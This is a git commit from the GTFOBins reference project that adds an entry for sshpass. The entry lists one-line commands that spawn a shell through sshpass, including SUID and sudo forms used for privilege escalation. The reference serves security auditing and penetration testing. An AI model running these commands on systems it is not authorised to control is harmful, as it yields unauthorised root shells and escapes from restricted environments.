Add sshpass

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
d4t4s3c 2022-01-20 14:11:03 +01:00 committed by GitHub
parent 8e9b57ccbd
commit 2c1efe6afd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/sshpass.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: sshpass /bin/sh
suid:
- code: ./sshpass /bin/sh -p
sudo:
- code: sudo sshpass /bin/sh
---